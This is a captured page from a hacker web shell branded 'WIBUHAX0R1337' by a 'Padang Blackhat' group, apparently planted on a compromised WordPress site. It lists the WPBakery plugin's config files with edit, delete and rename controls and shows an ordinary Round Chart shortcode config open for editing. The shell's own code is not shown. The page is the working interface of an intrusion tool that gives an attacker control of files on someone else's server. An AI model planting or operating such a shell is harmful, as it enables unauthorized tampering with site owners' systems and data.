-
WIBUHAX0R1337
-
/
home
/
cideo
/
www
/
wp-contentVIp
/
plugins
/
js_composer
/
config
/
content
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
shortcode-vc-column-text.php
1.097KB
Edit File
Delete File
Rename
shortcode-vc-custom-heading.php
0.129KB
Edit File
Delete File
Rename
shortcode-vc-empty-space.php
0.999KB
Edit File
Delete File
Rename
shortcode-vc-flickr.php
2.126KB
Edit File
Delete File
Rename
shortcode-vc-gallery.php
4.826KB
Edit File
Delete File
Rename
shortcode-vc-gmaps.php
2.027KB
Edit File
Delete File
Rename
shortcode-vc-icon.php
0.073KB
Edit File
Delete File
Rename
shortcode-vc-images-carousel.php
4.87KB
Edit File
Delete File
Rename
shortcode-vc-line-chart.php
4.295KB
Edit File
Delete File
Rename
shortcode-vc-message.php
9.243KB
Edit File
Delete File
Rename
shortcode-vc-pie.php
2.376KB
Edit File
Delete File
Rename
shortcode-vc-posts-slider.php
5.922KB
Edit File
Delete File
Rename
shortcode-vc-progress-bar.php
5.39KB
Edit File
Delete File
Rename
shortcode-vc-round-chart.php
4.931KB
Edit File
Delete File
Rename
shortcode-vc-separator.php
2.469KB
Edit File
Delete File
Rename
shortcode-vc-text-separator.php
4.218KB
Edit File
Delete File
Rename
shortcode-vc-toggle.php
4.356KB
Edit File
Delete File
Rename
shortcode-vc-video.php
2.382KB
Edit File
Delete File
Rename
vc-custom-heading-element.php
3.289KB
Edit File
Delete File
Rename
vc-icon-element.php
7.645KB
Edit File
Delete File
Rename
<?php return array( 'name' => __( 'Round Chart', 'js_composer' ), 'base' => 'vc_round_chart', 'class' => '', 'icon' => 'icon-wpb-vc-round-chart', 'category' => __( 'Content', 'js_composer' ), 'description' => __( 'Pie and Doughnat charts', 'js_composer' ), 'params' => array( array( 'type' => 'textfield', 'heading' => __( 'Widget title', 'js_composer' ), 'param_name' => 'title', 'description' => __( 'Enter text used as widget title (Note: located above content element).', 'js_composer' ), 'admin_label' => true, ), array( 'type' => 'dropdown', 'heading' => __( 'Design', 'js_composer' ), 'param_name' => 'type', 'value' => array( __( 'Pie', 'js_composer' ) => 'pie', __( 'Doughnut', 'js_composer' ) => 'doughnut', ), 'description' => __( 'Select type of chart.', 'js_composer' ), 'admin_label' => true, ), array( 'type' => 'dropdown', 'heading' => __( 'Style', 'js_composer' ), 'description' => __( 'Select chart color style.', 'js_composer' ), 'param_name' => 'style', 'value' => array( __( 'Flat', 'js_composer' ) => 'flat', __( 'Modern', 'js_composer' ) => 'modern', __( 'Custom', 'js_composer' ) => 'custom', ), 'dependency' => array( 'callback' => 'vcChartCustomColorDependency', ), ), array( 'type' => 'dropdown', 'heading' => __( 'Gap', 'js_composer' ), 'param_name' => 'stroke_width', 'value' => array( 0 => 0, 1 => 1, 2 => 2, 5 => 5, ), 'description' => __( 'Select gap size.', 'js_composer' ), 'std' => 2, ), array( 'type' => 'dropdown', 'heading' => __( 'Outline color', 'js_composer' ), 'param_name' => 'stroke_color', 'value' => getVcShared( 'colors-dashed' ) + array( __( 'Custom', 'js_composer' ) => 'custom' ), 'description' => __( 'Select outline color.', 'js_composer' ), 'param_holder_class' => 'vc_colored-dropdown', 'std' => 'white', 'dependency' => array( 'element' => 'stroke_width', 'value_not_equal_to' => '0', ), ), array( 'type' => 'colorpicker', 'heading' => __( 'Custom outline color', 'js_composer' ), 'param_name' => 'custom_stroke_color', 'description' => __( 'Select custom outline color.', 'js_composer' ), 'dependency' => array( 'element' => 'stroke_color', 'value' => array( 'custom' ), ), ), array( 'type' => 'checkbox', 'heading' => __( 'Show legend?', 'js_composer' ), 'param_name' => 'legend', 'description' => __( 'If checked, chart will have legend.', 'js_composer' ), 'value' => array( __( 'Yes', 'js_composer' ) => 'yes' ), 'std' => 'yes', ), array( 'type' => 'checkbox', 'heading' => __( 'Show hover values?', 'js_composer' ), 'param_name' => 'tooltips', 'description' => __( 'If checked, chart will show values on hover.', 'js_composer' ), 'value' => array( __( 'Yes', 'js_composer' ) => 'yes' ), 'std' => 'yes', ), array( 'type' => 'param_group', 'heading' => __( 'Values', 'js_composer' ), 'param_name' => 'values', 'value' => urlencode( json_encode( array( array( 'title' => __( 'One', 'js_composer' ), 'value' => '60', 'color' => 'blue', ), array( 'title' => __( 'Two', 'js_composer' ), 'value' => '40', 'color' => 'pink', ), ) ) ), 'params' => array( array( 'type' => 'textfield', 'heading' => __( 'Title', 'js_composer' ), 'param_name' => 'title', 'description' => __( 'Enter title for chart area.', 'js_composer' ), 'admin_label' => true, ), array( 'type' => 'textfield', 'heading' => __( 'Value', 'js_composer' ), 'param_name' => 'value', 'description' => __( 'Enter value for area.', 'js_composer' ), ), array( 'type' => 'dropdown', 'heading' => __( 'Color', 'js_composer' ), 'param_name' => 'color', 'value' => getVcShared( 'colors-dashed' ), 'description' => __( 'Select area color.', 'js_composer' ), 'param_holder_class' => 'vc_colored-dropdown', ), array( 'type' => 'colorpicker', 'heading' => __( 'Custom color', 'js_composer' ), 'param_name' => 'custom_color', 'description' => __( 'Select custom area color.', 'js_composer' ), ), ), 'callbacks' => array( 'after_add' => 'vcChartParamAfterAddCallback', ), ), array( 'type' => 'dropdown', 'heading' => __( 'Animation', 'js_composer' ), 'description' => __( 'Select animation style.', 'js_composer' ), 'param_name' => 'animation', 'value' => getVcShared( 'animation styles' ), 'std' => 'easeinOutCubic', ), array( 'type' => 'textfield', 'heading' => __( 'Extra class name', 'js_composer' ), 'param_name' => 'el_class', 'description' => __( 'Style particular content element differently - add a class name and refer to it in custom CSS.', 'js_composer' ), ), array( 'type' => 'css_editor', 'heading' => __( 'CSS box', 'js_composer' ), 'param_name' => 'css', 'group' => __( 'Design Options', 'js_composer' ), ), ), );
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat